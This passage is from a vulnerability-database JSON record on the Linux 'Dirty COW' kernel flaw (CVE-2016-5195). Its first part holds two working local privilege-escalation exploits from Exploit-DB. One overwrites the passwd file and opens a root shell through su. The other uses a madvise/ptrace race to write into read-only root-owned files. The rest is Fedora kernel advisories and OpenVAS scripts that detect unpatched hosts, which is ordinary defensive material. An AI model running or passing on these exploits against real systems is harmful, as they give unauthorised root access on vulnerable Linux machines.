etcPwdBak.size()){\r\n run = false; break;\r\n }\r\n iter ++; usleep(300000);\r\n }\r\n run = false;\r\n });\r\n\r\n cerr << \"Running ...\" << endl;\r\n madviseThr->join();\r\n writerThr->join();\r\n checkerThr->join();\r\n\r\n if(iter <= MAXITER){ \r\n child = forkpty(&master, nullptr, nullptr, nullptr);\r\n\r\n if(child == -1) exitOnError(\"Error forking pty.\");\r\n\r\n if(child == 0){ \r\n execlp(\"su\", \"su\", \"-\", nullptr);\r\n exitOnError(\"Error on exec.\");\r\n }\r\n\r\n if(opShell) cerr << \"Password overridden to: \" << TXTPWD << endl;\r\n memset(buffv, 0, BUFFSIZE);\r\n ssize_t bytes_read = read(master, buffv, BUFFSIZE - 1);\r\n if(bytes_read <= 0) exitOnError(\"Error reading su prompt.\");\r\n cerr << \"Received su prompt (\" << buffv << \")\" << endl; \r\n\r\n if(write(master, TXTPWD, strlen(TXTPWD)) <= 0) \r\n exitOnError(\"Error writing pwd on tty.\");\r\n\r\n if(write(master, DISABLEWB, strlen(DISABLEWB)) <= 0) \r\n exitOnError(\"Error writing cmd on tty.\");\r\n\r\n if(!opShell){\r\n if(write(master, EXITCMD, strlen(EXITCMD)) <= 0) \r\n exitOnError(\"Error writing exit cmd on tty.\");\r\n }else{\r\n if(restPwd){\r\n string restoreCmd = string(CPCMD).append(TMPBAKFILE).append(\" \").append(PWDFILE).append(\"\\n\");\r\n if(write(master, restoreCmd.c_str(), restoreCmd.size()) <= 0) \r\n exitOnError(\"Error writing restore cmd on tty.\");\r\n restoreCmd = string(RMCMD).append(TMPBAKFILE).append(\"\\n\");\r\n if(write(master, restoreCmd.c_str(), restoreCmd.size()) <= 0) \r\n exitOnError(\"Error writing restore cmd (rm) on tty.\");\r\n }\r\n\r\n if(tcgetattr(STDIN_FILENO, &termOld) == -1 )\r\n exitOnError(\"Error getting terminal attributes.\");\r\n \r\n termNew = termOld;\r\n termNew.c_lflag &= static_cast<unsigned long>(~(ICANON | ECHO));\r\n \r\n if(tcsetattr(STDIN_FILENO, TCSANOW, &termNew) == -1)\r\n exitOnError(\"Error setting terminal in non-canonical mode.\");\r\n rawMode = true;\r\n \r\n while(true){\r\n FD_ZERO(&rfds);\r\n FD_SET(master, 
&rfds);\r\n FD_SET(STDIN_FILENO, &rfds);\r\n \r\n if(select(master + 1, &rfds, nullptr, nullptr, nullptr) < 0 )\r\n exitOnError(\"Error on select tty.\");\r\n \r\n if(FD_ISSET(master, &rfds)) {\r\n memset(buffv, 0, BUFFSIZE);\r\n bytes_read = read(master, buffv, BUFFSIZE - 1);\r\n if(bytes_read <= 0) break;\r\n if(write(STDOUT_FILENO, buffv, bytes_read) != bytes_read)\r\n exitOnError(\"Error writing on stdout.\");\r\n }\r\n \r\n if(FD_ISSET(STDIN_FILENO, &rfds)) {\r\n memset(buffv, 0, BUFFSIZE);\r\n bytes_read = read(STDIN_FILENO, buffv, BUFFSIZE - 1);\r\n if(bytes_read <= 0) exitOnError(\"Error reading from stdin.\");\r\n if(write(master, buffv, bytes_read) != bytes_read) break;\r\n }\r\n }\r\n }\r\n }\r\n \r\n return [](int ret, bool shell){ \r\n string msg = shell ? \"Exit.\\n\" : string(\"Root password is: \") + TXTPWD + \"Enjoy! :-)\\n\";\r\n if(ret <= MAXITER){cerr << msg; return 0;}\r\n else{cerr << \"Exploit failed.\\n\"; return 1;} \r\n }(iter, opShell);\r\n}\r\n\r\nvoid printInfo(char* cmd){\r\n cerr << cmd << \" [-s] [-n] | [-h]\\n\" << endl;\r\n cerr << \" -s open directly a shell, if the exploit is successful;\" << endl;\r\n cerr << \" -n combined with -s, doesn't restore the passwd file.\" << endl;\r\n cerr << \" -h print this synopsis;\" << endl;\r\n cerr << \"\\n If no param is specified, the program modifies the passwd file and exits.\" << endl;\r\n cerr << \" A copy of the passwd file will be create in the current directory as .ssh_bak\" << endl;\r\n cerr << \" (unprivileged user), if no parameter or -n is specified.\\n\" << endl;\r\n exit(1);\r\n}\r\n\r\nint main(int argc, char** argv){\r\n const char flags[] = \"shn\";\r\n int c;\r\n bool opShell = false,\r\n restPwd = true;\r\n\r\n opterr = 0;\r\n while ((c = getopt(argc, argv, flags)) != -1){\r\n switch (c){\r\n case 's':\r\n opShell = true;\r\n break;\r\n case 'n':\r\n restPwd = false;\r\n break;\r\n case 'h':\r\n printInfo(argv[0]);\r\n break;\r\n default:\r\n cerr << \"Invalid parameter.\" 
<< endl << endl;\r\n printInfo(argv[0]);\r\n }\r\n }\r\n\r\n if(!restPwd && !opShell){\r\n cerr << \"Invalid parameter: -n requires -s\" << endl << endl;\r\n printInfo(argv[0]);\r\n }\r\n\r\n Dcow dcow(opShell, restPwd);\r\n return dcow.expl();\r\n}", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/40847/"}, {"lastseen": "2016-11-28T21:23:36", "description": "Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (Write Access). CVE-2016-5195. Local exploit for Linux platform", "published": "2016-10-26T00:00:00", "type": "exploitdb", "title": "Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (Write Access)", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-5195"], "modified": "2016-10-26T00:00:00", "id": "EDB-ID:40838", "href": "https://www.exploit-db.com/exploits/40838/", "sourceData": "// $ echo pikachu|sudo tee pokeball;ls -l pokeball;gcc -pthread pokemon.c -o d;./d pokeball miltank;cat pokeball\r\n#include <fcntl.h> //// pikachu\r\n#include <pthread.h> //// -rw-r--r-- 1 root root 8 Apr 4 12:34 pokeball\r\n#include <string.h> //// pokeball\r\n#include <stdio.h> //// (___)\r\n#include <stdint.h> //// (o o)_____/\r\n#include <sys/mman.h> //// @@ ` \\ \r\n#include <sys/types.h> //// \\ ____, /miltank\r\n#include <sys/stat.h> //// // //\r\n#include <sys/wait.h> //// ^^ ^^\r\n#include <sys/ptrace.h> //// mmap bc757000\r\n#include <unistd.h> //// madvise 0\r\n////////////////////////////////////////////// ptrace 0\r\n////////////////////////////////////////////// miltank\r\n//////////////////////////////////////////////\r\nint f ;// file descriptor\r\nvoid *map ;// memory map\r\npid_t pid ;// process id\r\npthread_t pth ;// thread\r\nstruct stat st ;// file info\r\n//////////////////////////////////////////////\r\nvoid *madviseThread(void *arg) {// madvise thread\r\n int i,c=0 ;// 
counters\r\n for(i=0;i<200000000;i++)//////////////////// loop to 2*10**8\r\n c+=madvise(map,100,MADV_DONTNEED) ;// race condition\r\n printf(\"madvise %d\\n\\n\",c) ;// sum of errors\r\n }// /madvise thread\r\n//////////////////////////////////////////////\r\nint main(int argc,char *argv[]) {// entrypoint\r\n if(argc<3)return 1 ;// ./d file contents\r\n printf(\"%s \\n\\\r\n (___) \\n\\\r\n (o o)_____/ \\n\\\r\n @@ ` \\\\ \\n\\\r\n \\\\ ____, /%s \\n\\\r\n // // \\n\\\r\n ^^ ^^ \\n\\\r\n\", argv[1], argv[2]) ;// dirty cow\r\n f=open(argv[1],O_RDONLY) ;// open read only file\r\n fstat(f,&st) ;// stat the fd\r\n map=mmap(NULL ,// mmap the file\r\n st.st_size+sizeof(long) ,// size is filesize plus padding\r\n PROT_READ ,// read-only\r\n MAP_PRIVATE ,// private mapping for cow\r\n f ,// file descriptor\r\n 0) ;// zero\r\n printf(\"mmap %lx\\n\\n\",(unsigned long)map);// sum of error code\r\n pid=fork() ;// fork process\r\n if(pid) {// if parent\r\n waitpid(pid,NULL,0) ;// wait for child\r\n int u,i,o,c=0,l=strlen(argv[2]) ;// util vars (l=length)\r\n for(i=0;i<10000/l;i++)//////////////////// loop to 10K divided by l\r\n for(o=0;o<l;o++)//////////////////////// repeat for each byte\r\n for(u=0;u<10000;u++)////////////////// try 10K times each time\r\n c+=ptrace(PTRACE_POKETEXT ,// inject into memory\r\n pid ,// process id\r\n map+o ,// address\r\n *((long*)(argv[2]+o))) ;// value\r\n printf(\"ptrace %d\\n\\n\",c) ;// sum of error code\r\n }// otherwise\r\n else {// child\r\n pthread_create(&pth ,// create new thread\r\n NULL ,// null\r\n madviseThread ,// run madviseThred\r\n NULL) ;// null\r\n ptrace(PTRACE_TRACEME) ;// stat ptrace on child\r\n kill(getpid(),SIGSTOP) ;// signal parent\r\n pthread_join(pth,NULL) ;// wait for thread\r\n }// / child\r\n return 0 ;// return\r\n }// / entrypoint\r\n//////////////////////////////////////////////", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": 
"https://www.exploit-db.com/download/40838/"}], "fedora": [{"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5195"], "description": "The kernel meta package ", "modified": "2016-10-22T17:20:39", "published": "2016-10-22T17:20:39", "id": "FEDORA:800BC60776C5", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 24 Update: kernel-4.7.9-200.fc24", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5195"], "description": "The kernel meta package ", "modified": "2016-10-22T12:53:27", "published": "2016-10-22T12:53:27", "id": "FEDORA:6A06E60877B7", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 25 Update: kernel-4.8.3-300.fc25", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5195"], "description": "The kernel meta package ", "modified": "2016-10-23T22:49:20", "published": "2016-10-23T22:49:20", "id": "FEDORA:9A84E605A374", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 23 Update: kernel-4.7.9-100.fc23", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-05-29T18:35:29", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-5195"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2016-12-05T00:00:00", "id": "OPENVAS:1361412562310842975", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842975", "type": "openvas", "title": "Ubuntu Update for linux USN-3107-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux USN-3107-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can 
redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842975\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-05 09:53:03 +0100 (Mon, 05 Dec 2016)\");\n script_cve_id(\"CVE-2016-5195\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux USN-3107-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"It was discovered that a race condition\n existed in the memory manager of the Linux kernel when handling copy-on-write\n breakage of private read-only memory mappings. 
A local attacker could use this\n to gain administrative privileges.\");\n script_tag(name:\"affected\", value:\"linux on Ubuntu 16.10\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3107-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3107-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU16\\.10\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU16.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.8.0-26-generic\", ver:\"4.8.0-26.28\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.8.0-26-generic-lpae\", ver:\"4.8.0-26.28\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.8.0-26-lowlatency\", ver:\"4.8.0-26.28\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.8.0-26-powerpc-e500mc\", ver:\"4.8.0-26.28\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.8.0-26-powerpc-smp\", ver:\"4.8.0-26.28\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.8.0-26-powerpc64-emb\", ver:\"4.8.0-26.28\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": 
{"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:49", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-5195"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2016-10-21T00:00:00", "id": "OPENVAS:1361412562310842920", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842920", "type": "openvas", "title": "Ubuntu Update for linux USN-3104-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux USN-3104-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842920\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-10-21 05:54:02 +0200 (Fri, 21 Oct 2016)\");\n script_cve_id(\"CVE-2016-5195\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux USN-3104-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"It was discovered that a race condition\n existed in the memory manager of the Linux kernel when handling copy-on-write\n breakage of private read-only memory mappings. 
A local attacker could use this\n to gain administrative privileges.\");\n script_tag(name:\"affected\", value:\"linux on Ubuntu 12.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3104-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3104-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU12\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-113-generic\", ver:\"3.2.0-113.155\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-113-generic-pae\", ver:\"3.2.0-113.155\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-113-highbank\", ver:\"3.2.0-113.155\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-113-omap\", ver:\"3.2.0-113.155\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-113-powerpc-smp\", ver:\"3.2.0-113.155\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-113-powerpc64-smp\", ver:\"3.2.0-113.155\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isdpkgvuln(pkg:\"linux-image-3.2.0-113-virtual\", ver:\"3.2.0-113.155\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:15", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-5195"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2016-10-21T00:00:00", "id": "OPENVAS:1361412562310842926", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842926", "type": "openvas", "title": "Ubuntu Update for linux-snapdragon USN-3106-4", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux-snapdragon USN-3106-4\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842926\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-10-21 05:54:08 +0200 (Fri, 21 Oct 2016)\");\n script_cve_id(\"CVE-2016-5195\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux-snapdragon USN-3106-4\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-snapdragon'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"It was discovered that a race condition\n existed in the memory manager of the Linux kernel when handling copy-on-write\n breakage of private read-only memory mappings. 
A local attacker could use this\n to gain administrative privileges.\");\n script_tag(name:\"affected\", value:\"linux-snapdragon on Ubuntu 16.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3106-4\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3106-4/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU16\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1032-snapdragon\", ver:\"4.4.0-1032.36\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:00", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-5195"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2016-11-14T00:00:00", "id": "OPENVAS:1361412562310809956", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310809956", "type": "openvas", "title": "Fedora Update for kernel FEDORA-2016-c3558808cd", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for kernel FEDORA-2016-c3558808cd\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free 
software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.809956\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-11-14 18:00:31 +0530 (Mon, 14 Nov 2016)\");\n script_cve_id(\"CVE-2016-5195\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for kernel FEDORA-2016-c3558808cd\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"kernel on Fedora 23\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-c3558808cd\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/W3APRVDVPDBXLH4DC5UKZVCR742MJIM3\");\n script_tag(name:\"solution_type\", 
value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC23\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC23\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.7.9~100.fc23\", rls:\"FC23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:08", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-5195"], "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2016-10-25T00:00:00", "id": "OPENVAS:1361412562310871675", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871675", "type": "openvas", "title": "RedHat Update for kernel RHSA-2016:2098-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for kernel RHSA-2016:2098-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871675\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-10-25 05:53:24 +0200 (Tue, 25 Oct 2016)\");\n script_cve_id(\"CVE-2016-5195\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for kernel RHSA-2016:2098-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nSecurity Fix(es):\n\n * A race condition was found in the way the Linux kernel's memory subsystem\nhandled the copy-on-write (COW) breakage of private read-only memory\nmappings. An unprivileged, local user could use this flaw to gain write\naccess to otherwise read-only memory mappings and thus increase their\nprivileges on the system. (CVE-2016-5195, Important)\n\nRed Hat would like to thank Phil Oester for reporting this issue.\");\n script_tag(name:\"affected\", value:\"kernel on Red Hat Enterprise Linux Server (v. 
